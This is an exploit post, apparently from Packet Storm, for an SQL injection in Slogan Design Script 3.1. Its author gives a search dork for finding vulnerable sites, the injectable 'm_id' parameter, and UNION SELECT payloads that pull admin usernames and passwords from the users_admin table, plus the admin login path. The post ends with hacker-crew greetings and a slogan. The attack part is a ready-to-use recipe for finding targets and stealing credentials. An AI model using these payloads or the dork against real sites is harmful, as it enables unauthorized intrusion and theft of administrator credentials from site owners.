Slogan Design Script version 3.1 suffers from a remote SQL injection vulnerability.
43d9957f2c041edd455fcc21ed5e6b56f70ad6c7676b1072a20b58e79e9f4308
# Title: slogan design Script SQL Injection Vulnerability
# Version: 3.1
# Author: Mr.P3rfekT
# Software Site: http://www.slogandesign.co.il
# Tested on Lunix
# CVE : N/A
############### Founded By Mr.P3rfekT --- We Will Not Go Down ###############
# Dork : " inurl:"index.php?m_id="
# Helllo Allz.
# Exploit :
http://[site]/path/index.php?m_id={SQLi}
# Poc Username:
union select 1,2,3,4,5,6,7,8,name,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from users_admin
# Poc Password:
union select 1,2,3,4,5,6,7,8,pass,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from users_admin
# Demo:
http://[site]/union select 1,2,3,4,5,6,7,8,name,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from users_admin
# Admin Login
# http://[site]/admin/login.php
# ./done.
####################################################################
Save Gaza Save Palastine With This Exploit
We Will Not Go Down In Gaza Tonight
MaiL :R4p@hotmail.com
Greeetz To : Dr.AngeL (ŞŷяįăŃ ĦДçЌЭЯ),Sinaritx,HcJ,Mr.Black,D3ViL H4CK3R,Uzm4n,Nani17,Cyb3r-DeViL,www.v4-team.com,www.arab-exploit.com Cr3w,www.Barcelonasy.com & All Who Known Me
###############################################
_________________________________________________________________
بريدك الإلكتروني والمزيد أثناء تنقلك. احصل على Windows Live Hotmail مجانًا.
https://signup.live.com/signup.aspx?id=60969
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed